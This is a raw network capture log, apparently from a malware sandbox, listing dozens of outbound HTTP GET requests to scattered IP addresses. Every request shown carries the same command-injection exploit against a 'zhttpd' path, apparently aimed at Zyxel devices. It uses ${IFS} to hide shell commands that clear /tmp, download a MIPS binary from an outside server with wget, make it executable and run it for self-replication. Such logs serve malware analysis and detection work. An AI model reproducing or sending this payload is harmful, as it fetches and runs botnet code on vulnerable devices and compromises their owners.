                                                        Feb 2, 2024 06:20:54.632364988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        704192.168.2.14329001.195.30.148443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.632400990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        705192.168.2.1459632187.171.101.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.632416964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        706192.168.2.145594635.76.246.92443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.632437944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        707192.168.2.1445300219.12.163.101443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.632469893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        708192.168.2.1445572136.176.19.231443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.632528067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        709192.168.2.143437248.211.217.131443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.632565975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        710192.168.2.143701065.36.66.9443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.632590055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        711192.168.2.144392488.165.34.21443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.632615089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        712192.168.2.145509850.93.156.60443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.632663965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        713192.168.2.1447166181.109.172.69443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.632705927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        714192.168.2.1447818173.119.140.24443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.632725954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        715192.168.2.143715872.182.210.204443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.632781982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        716192.168.2.1450346126.194.249.93443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.632812977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        717192.168.2.1456512211.208.29.56443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.632849932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        718192.168.2.1459600119.102.170.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.632884026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        719192.168.2.1451618181.251.62.71443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.632910013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        720192.168.2.145268045.235.166.136443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.632950068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        721192.168.2.145715246.231.63.52443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.632985115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        722192.168.2.143986462.217.53.224443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.633038044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        723192.168.2.1435500103.211.124.6443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.633061886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        724192.168.2.145534494.57.137.23443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.633102894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        725192.168.2.1454730168.84.133.100443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.633130074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        726192.168.2.144387051.2.248.199443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.633167982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        727192.168.2.1459940132.149.84.136443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.633193970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        728192.168.2.1446558109.91.88.240443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.633230925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        729192.168.2.1455502163.228.156.47443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.633272886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        730192.168.2.1457618166.119.10.101443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.633306980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        731192.168.2.144978651.226.45.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.633342981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        732192.168.2.1437738131.171.185.240443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.633397102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        733192.168.2.143789457.141.179.110443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.633425951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        734192.168.2.145727890.227.50.38443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.633455038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        735192.168.2.1444078187.32.54.215443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.633486032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        736192.168.2.1438244115.208.204.45443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.636451960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        737192.168.2.1456268131.4.138.76443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.637048960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        738192.168.2.1443692198.152.181.175443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.637080908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        739192.168.2.144731432.230.59.242443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.637137890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        740192.168.2.145920649.155.233.33443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.637155056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        741192.168.2.14530488.6.20.118443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.637197971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        742192.168.2.145599018.23.83.85443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.637243032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        743192.168.2.1438628117.67.50.5443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.637275934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        744192.168.2.1433554210.55.50.131443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.637312889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        745192.168.2.145845061.251.98.114443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.637346029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        746192.168.2.1434182158.242.200.105443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.637387991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        747192.168.2.145042619.54.248.214443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.637434959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        748192.168.2.1438962209.167.110.229443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.637475014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        749192.168.2.1439196145.183.199.155443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.637495041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        750192.168.2.144908854.192.209.154443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.637514114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        751192.168.2.1450748100.164.112.38443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.637566090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        752192.168.2.144174084.200.123.13443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.637608051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        753192.168.2.14601409.117.151.0443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.626454115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        754192.168.2.1460744211.140.197.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.626552105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        755192.168.2.1438776124.33.41.231443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.626586914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        756192.168.2.144062897.224.196.212443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.626653910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        757192.168.2.145512442.190.74.98443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.626708031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        758192.168.2.143963625.128.98.237443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.626761913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        759192.168.2.145941851.137.78.5443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.626795053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        760192.168.2.1437854168.121.239.196443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.626827002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        761192.168.2.1453998223.82.53.53443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.626878023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        762192.168.2.1457728130.199.7.5443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.626912117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        763192.168.2.144457440.128.10.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.626955032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        764192.168.2.1440840161.34.241.221443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.626985073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        765192.168.2.143445082.77.191.160443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.627022028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        766192.168.2.145384612.170.193.84443
                                                        TimestampBytes transferredDirectionData
